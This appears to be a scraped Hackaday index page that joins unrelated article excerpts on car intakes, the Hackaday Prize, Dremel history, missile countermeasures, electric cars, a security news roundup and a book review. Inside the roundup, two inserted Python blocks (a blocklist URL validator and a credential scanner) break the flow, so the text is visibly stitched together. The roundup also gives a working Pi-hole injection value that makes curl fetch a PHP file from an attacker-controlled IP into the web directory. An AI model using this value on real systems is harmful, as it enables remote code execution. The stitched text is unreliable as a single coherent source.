While the car world is obsessed with everything boosted these days, many still yearn for the smooth power delivery and sonorous tone of a naturally aspirated engine. Of course, everyone still wants to go fast, so here’s how you go about getting more power out of your car without bolting on a big turbo or whining supercharger.
Intakes: This Can Get Pretty Involved
A modified intake installed on a Honda S2000. Also referred to as “cold-air intakes”, they aim to suck in air at lower temperature which helps produce more power – hence the shield between the air filter and exhaust.
The intake is one of the first modifications made by many budding car enthusiasts. Throwing on a chromed intake pipe with a big pod filter was the mod to have back in the Fast and Furious era. Power gains can be had, though typically these are minor – on the order of 5-10 horsepower at most. It all depends on the car in question. A BMW M5 V10 was designed for high performance, with a highly advanced intake with individual throttle bodies from the factory. It’s unlikely any eBay parts are going to unlock horsepower that BMW’s engineers didn’t already find. Conversely, early Mazda Miatas are known to have a restrictive intake, largely due to the flap-type air flow meter. Replacing this with a freer-flowing setup has merit.
The 2020 Hackaday Prize begins right now. Our global engineering challenge seeks solutions to real-world problems. If you like to come up with creative solutions to tough problems, four non-profits can use your help. We need hackers, designers, and engineers throughout the world to work on designs for conservation, disaster relief, renewable resources, and assistive devices.
This is the seventh year of the Hackaday Prize, and like past years we want to see your ideas take shape, so share your design process in detail as a project page on Hackaday.io. Over $200,000 in prizes are at stake, with a $50,000 prize for the all around best solution which will then be designed for manufacture at Supplyframe’s DesignLab, produced in a limited run, and deployed in the field.
New this year is our partnership with non-profits that have each outlined challenges they are facing. Eight projects, one top finisher, and one runner up from each of the four categories of challenges, will receive $10,000 and $3,000 respectively. As with previous years, the bootstrap round offers some seed money for getting your prototype off the ground: up to $500 for each of the top twenty during early entry judging. There’s even a $5,000 wildcard prize for entries that don’t specifically address challenges from the four categories. Here’s a taste of the categories you can work on:
Develop solutions to combat invasive species in marine and island environments, and help craft tools for protecting our natural ocean landscapes
Low cost tools for use in the field like heat sealers/welders, and medical devices like IV fluid warmers
Adaptive technologies for workstations like trackballs, joysticks, and large button controllers
Modular add-ons for earthen housing for connectivity, light, heating, and water storage
Albert Dremel developed the now famous rotary tool and started the company in 1932 to make blade sharpeners. It would be 1935 before the company produced the Moto-Tool which is mostly recognizable as an ancestor of the modern Dremel.
Dremel achieved such dominance that today the name is synonymous with rotary tools in the same way Xerox means photocopy and Crock-Pot is any slow cooker. Sure, there are knock offs you can get from the usual cheap tool outlets, but generally, people reach for a Dremel even when it isn’t really one. Today that tool might really be a Black and Decker or a Dewalt or even a cheap brand like Wen or Chicago Electric. But in the first half of the 20th century, you might have reached for a Handee.
A Whole Shop Full of Tools
The Handee was a product of the Chicago Wheel and Manufacturing Company who, in 1937, billed it as “a whole shop full of tools in one,” as you can see in this ad. While $10.75 might sound like a price for a Harbor Freight cheapie tool, adjusted for inflation that’s around $200 in 2020 money. At least for that price you got three free accessories out of the over 200 available.
I didn’t remember the Handee and I wanted to see if I could figure out what happened to it and the company who made it. After all, with the Internet at your disposal, how hard could it be? Turns out, I did learn a lot, but in the end, tracing down a company like this from the old days isn’t always as easy as you might think.
Air-to-air combat or “dogfighting” was once a very personal affair. Pilots of the First and Second World War had to get so close to land a hit with their guns that it wasn’t uncommon for altercations to end in a mid-air collision. But by the 1960s, guided missile technology had advanced to the point that a fighter could lock onto an enemy aircraft and fire before the target even came into visual range. The skill and experience of a pilot was no longer enough to guarantee the outcome of an engagement, and a new arms race was born.
An F-15 launching flare countermeasures.
Naturally, the move to guided weapons triggered the development of defensive countermeasures that could confuse them. If the missile is guided by radar, the target aircraft can eject a cloud of metallic strips known as chaff to overwhelm its targeting system. Heat-seeking missiles can be thrown off with a flare that burns hotter than the aircraft’s engine exhaust. Both techniques are simple, reliable, and have remained effective after more than a half-century of guided missile development.
But they aren’t perfect. The biggest problem is that both chaff and flares are a finite resource: once the aircraft has expended its stock, it’s left defenseless. They also only work for a limited amount of time, which makes timing their deployment absolutely critical. Automated dispensers can help ensure that the countermeasures are used as efficiently as possible, but sustained enemy fire could still deplete the aircraft’s defensive systems if given enough time.
In an effort to develop the ultimate in defensive countermeasures, the United States Navy has been working on a system that can project decoy aircraft in mid-air. Referred to as “Ghosts” in the recently published patent, several of these phantom aircraft could be generated for as long as the system has electrical power. History tells us that the proliferation of this technology will inevitably lead to the development of an even more sensitive guided missile, but in the meantime, it could give American aircraft a considerable advantage in any potential air-to-air engagements.
A while back, I sat in the newish electric car that was the pride and joy of a friend of mine, and had what was at the time an odd experience. Instead of getting in, turning the key, and driving off, the car instead had to boot up.
The feeling was of a piece of software rather than a piece of hardware, and there was a tangible wait before the start button could be pressed. It was a miracle of technology that could travel smoothly and quietly for all but the longest journeys I could possibly throw at it on relative pennies-worth of electricity, but I hated it. As a technologist and car enthusiast, I should be all over these types of motor vehicles. I live for new technology and I lust after its latest incarnations in many fields including automobiles.
I want my next car to have an electric motor, I want it to push the boundaries of what is capable with a battery and I want it to be an automotive tour de force. The switch to electric cars represents an opportunity like no other to deliver a new type of car that doesn’t carry the baggage of what has gone before, but in that car I saw a future in which they were going badly astray.
I don’t want my next vehicle to be a car like my friend’s one, and to understand why that is the case it’s worth going back a few decades to the cars my parents drove back when jumpers were goalposts, and the home computer was just a gleam in the eye of a few long-haired outsiders in California.
Thunderspy was announced this week, developed by [Björn Ruytenberg]. A series of attacks on the Thunderbolt 3 protocol, Thunderspy is the next vulnerability in the style of Inception, PCILeech, and Thunderclap.
Inception and PCILeech were attacks on the naive Direct Memory Access (DMA) built into FireWire, Thunderbolt 1, and PCIe. A device could connect and request DMA over the link. Once granted, it could access the bottom four gigabytes of system memory, with both read and write access. It’s not hard to imagine how that would be a huge security problem, and it seems that this technique was in use by intelligence agencies at the time it was discovered. As an aside, the hardware DMA was entirely independent of software, so it was possible to debug a crashed kernel over FireWire.
Once the vulnerability was made public, hardware and software vendors took steps to harden their systems against the attack. Thunderbolt 2 introduced security levels as a mitigation against the attacks. A user has to mark a device as trusted before DMA is offered to that device. Thunderclap exploited a series of vulnerabilities in how individual OSes interacted with those hardware mitigations.
Image by Björn Ruytenberg. Licensed under CC BY 4.0.
Now, Thunderspy abuses a series of problems in Intel’s Thunderbolt 3 specification and implementation. One interesting attack is cloning an already trusted Thunderbolt device. Plugging a Thunderbolt device into a Linux machine easily captures the device UUID. A malicious Thunderbolt device can be given that same UUID, and suddenly has the same level of trust as the cloned device.
[Björn] took the attack a step further, and discovered that he could disassemble a laptop or Thunderbolt device, and read the firmware directly off the Thunderbolt controller. That firmware can be modified and re-uploaded. One of the simplest attacks that enables is turning the security level to its lowest setting.
It’s interesting research, and there are fixes coming or already in place to mitigate the problems found. The real question is how much Thunderspy matters. The threat model is the evil maid: A laptop left in a motel room would be available to the cleaning staff for a few minutes. Thunderspy could potentially be used for this style of attack, but there are many other potentially better attack options. There is a narrow circumstance where Thunderspy is the perfect technique: A device with an encrypted drive, that’s been powered on and logged into, but locked. In this case, Thunderspy could be used to recover the drive encryption key stored in memory, and then used to plant malware.
That Time When Facebook Broke Everything
You may have noticed some widespread iOS application misbehavior on the 6th. Facebook introduced a change to the server component of their sign-on SDK, which caused many apps that made use of that SDK to crash. It’s worth asking if it’s a good idea for so many popular apps to use Facebook code. There doesn’t appear to have been a vulnerability or path to compromise other than the denial of service.
Large-scale WordPress attack
Nearly a million WordPress sites are under attack, in a campaign targeting a variety of vulnerabilities. The general attack strategy is to inject malicious JavaScript that lies dormant until it’s executed by a site administrator. Ironically, logging in to your site to check it for compromise could be the trigger that leads to compromise. As always, keep your plugins up to date and follow the rest of the best practices.
GoDaddy Breaches
GoDaddy users were recently informed that there was a breach that exposed portions of their accounts to compromise. Notably, the compromise happened back in October of 2019, and wasn’t discovered for 6 months. GoDaddy has stated that there wasn’t any evidence of any malicious action beyond the initial compromise, which is puzzling in itself.
On April 23, 2020, we identified SSH usernames and passwords had been compromised through an altered SSH file in our hosting environment. This affected approximately 28,000 customers. We immediately reset these usernames and passwords, removed the offending SSH file from our platform, and have no indication the threat actor used our customers’ credentials or modified any customer hosting accounts. To be clear, the threat actor did not have access to customers’ main GoDaddy accounts.
Pi-hole Exploit
A fun RCE exploit was discovered in the Pi-hole software. This particular problem requires authenticated access to the Pi-hole administrative web interface, so it’s not likely to cause too many problems on its own. Exploiting the flaw is simple, just set http://192.168.122.1#" -o fun.php -d " as the remote blocklist, with an IP that you control. Under the hood, the remote blocklist is fetched via curl, and the URL isn’t properly sanitized. Your PHP code is saved in the web directory, and an HTTP request triggers that code.
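The root cause described above is a user-supplied URL reaching curl with its quotes and spaces intact, so part of the value is parsed as extra curl options. The following is an added example, not Pi-hole's actual code or its fix: it shows one way to validate a blocklist URL and hand it to curl as a single positional argument. The function names, the rejected character set and the output path are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Characters with no place in a blocklist URL: whitespace, quotes, control
# characters and shell metacharacters (assumed set, chosen for this example).
_FORBIDDEN = re.compile(r'[\s"\'`$\\;|&<>(){}]|[\x00-\x1f\x7f]')


class BlocklistUrlError(ValueError):
    """Raised when a blocklist URL must not be passed to the fetcher."""


def validate_blocklist_url(url: str) -> str:
    """Return the URL unchanged if it is acceptable, otherwise raise."""
    if _FORBIDDEN.search(url):
        raise BlocklistUrlError("whitespace, quote or shell metacharacter in URL")
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. malformed IPv6 literal
        raise BlocklistUrlError(str(exc)) from exc
    if parts.scheme not in ("http", "https"):
        raise BlocklistUrlError("only http and https are accepted")
    if not parts.hostname:
        raise BlocklistUrlError("URL has no host")
    if parts.username or parts.password:
        raise BlocklistUrlError("embedded credentials are not accepted")
    return url


def build_fetch_argv(url: str, out_path: str) -> list[str]:
    """Build an argv list for curl; it is never joined into a shell string."""
    safe = validate_blocklist_url(url)
    # out_path is chosen by the application, never taken from the request.
    # "--" ends option parsing, so the URL can only be a positional argument.
    return ["curl", "--silent", "--fail", "--proto", "=http,https",
            "--output", out_path, "--", safe]


def is_accepted(url: str) -> bool:
    """Convenience wrapper for bulk-checking stored blocklist entries."""
    try:
        validate_blocklist_url(url)
        return True
    except BlocklistUrlError:
        return False
```

Running `is_accepted` over the blocklist URLs already stored in a configuration is a quick way to spot entries that should never have been saved.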
Leaking on GitHub
[Tillson Galloway] tells the story of how he made $10,000 in bug bounties, simply by searching GitHub for passwords and keys that shouldn’t be there. By searching for specific keywords, he found all sorts of interesting, unintentional things. vim_settings.xml contains recently copied and pasted strings, and .bash_history contains a record of commands that have been run. How many times have you accidentally typed a password on the command line, thinking you were authenticating with SSH or sudo? It’s an easy mistake to accidentally include one of these hidden files in a public repository.
There have been examples of API keys accidentally included in source code drops, and even SSL certificates leaked this way over the years. It’s a lesson to all of us: make sure to sanitize projects before pushing code to GitHub.
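One way to do that sanitizing before a push is to scan the working tree for the file names and credential patterns mentioned above. This is an added example, not a tool from the article: the file-name list beyond .bash_history and vim_settings.xml, the two content patterns and the sample repository are all constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# File names the article calls out, plus a few similar ones (assumed list).
RISKY_NAMES = {".bash_history", "vim_settings.xml", ".zsh_history", ".env", "id_rsa"}

# Illustrative content patterns; a production scanner carries many more.
PATTERNS = {
    "private key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "credential assignment": re.compile(
        r"(?i)(password|passwd|secret|api[_-]?key|token)\s*[=:]\s*\S{6,}"),
}


def scan_tree(root):
    """Return sorted (relative path, reason) findings for files under root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):  # pathlib's glob also matches dotfiles
        if not path.is_file() or ".git" in path.relative_to(root).parts:
            continue
        rel = path.relative_to(root).as_posix()
        if path.name in RISKY_NAMES:
            findings.append((rel, "risky file name"))
        text = path.read_text(errors="ignore")
        for reason, rx in PATTERNS.items():
            if rx.search(text):
                findings.append((rel, reason))
    return sorted(findings)


def demo():
    """Build a constructed sample repository and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp)
        (repo / "src").mkdir()
        (repo / "src" / "app.py").write_text("print('hello')\n")
        (repo / "src" / "settings.py").write_text(
            'API_KEY = "constructed-not-a-real-key"\n')
        (repo / ".bash_history").write_text("ls -la\nssh deploy@host.example\n")
        return scan_tree(repo)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

A scan like this only covers the current tree; a secret that was committed earlier and later deleted is still in the repository history and has to be rotated.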
For many of us, our passion for electronics and science originated with curiosity about some device, a computer, radio, or even a car. The subject of this book has just such an origin. However, how many of us made this discovery and pursued this path during times of hunger or outright famine?
That’s the remarkable story of William Kamkwamba that’s told in the book, The Boy Who Harnessed the Wind. Remarkable because it culminates with his building a windmill (more correctly called a wind turbine) that powered lights in his family’s house all by the young age of fifteen. As you’ll see, it’s also the story of an unyielding thirst for knowledge in the face of famine and doubt by others.